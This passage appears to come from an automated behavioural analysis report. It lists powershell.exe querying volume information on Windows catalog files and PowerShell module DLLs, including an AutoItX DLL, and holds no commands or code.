Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation